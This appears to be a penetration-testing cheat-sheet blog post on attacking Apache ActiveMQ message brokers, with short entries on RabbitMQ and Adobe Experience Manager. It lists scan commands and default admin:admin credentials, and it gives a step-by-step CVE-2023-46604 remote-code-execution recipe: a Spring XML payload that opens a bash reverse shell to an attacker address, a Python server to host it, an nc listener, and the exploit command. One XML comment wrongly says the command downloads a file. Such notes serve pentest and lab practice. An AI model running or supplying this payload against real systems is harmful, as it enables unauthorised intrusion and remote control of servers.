#Commonly Observed on
Ports - 32064, 32357, 61616l
you will find it together with RMI (1099 Port) & a webserver (6161 - jetty)
Nmap Scan
nmap -sV -Pn -n -T4 --script amqp-info -p 61616 10.10.10.10
Web server -- http://10.10.10.10:8161/admin -> default creds- admin:admin
#Query the server
curl -d 'body="Hello World"' "http://10.10.10.10:8161/demo/message/test?type=queue&clientId=consumerA"
curl -u admin:admin -d "body=message" http://localhost:8161/api/message/TEST?type=queue
Connecting to ActiveMQ (Might require creds)
#Download activemq from here
unzip filename
go to conf/activemq-cli.config --> and update the IP Address
broker {
local {
amqurl = "tcp://10.10.10.10:32064"
jmxurl = "service:jmx:rmi:///jndi/rmi://10.10.10.10:1099/jmxrmi"
username = ""
password = ""
prompt-color = "light-blue" // Possible values: "gray", "red", "light-red", "light-green", "green", "light-yellow", "yellow", "light-blue", "blue", "light-purple", "purple", "$
}
}
/bin/activemq
> connect --broker local
> send-message --body local --queue SendQueue
> queues
> list-messages -queue SendQueue
ActiveMQ Exploit - CVE-2023-46604 git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ.git #Update poc-linux.xml as below <?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <!-- The command below downloads the file and saves it as test.elf --> <value>bash -i >& /dev/tcp/10.10.10.10/9001 0>&1</value> </list> </constructor-arg> </bean> </beans> #Start a python web server python3 -m http.server 8001 #Start nc, get you rev shell here nc -nvlp 9001 #Run the exploit go run main.go -i Target_ServerIP -u http://Attacher_host:8001/poc-linux.xml
AMQP/ ActiveMQ - 5671, 5672/tcp
Rabbitmq uses these ports - More Info Here
git clone https://github.com/QKaiser/cottontail
pip3 install .
python3 setup.py install
cottontail
or
cottontail/bin/cottontail -h
python3 cottontail --username guest --password guest -v https://10.10.10.10
AEM - Adobe Experience Manager
https://github.com/bl4de/security-tools/blob/master/aem-explorer.py
Comments
Post a Comment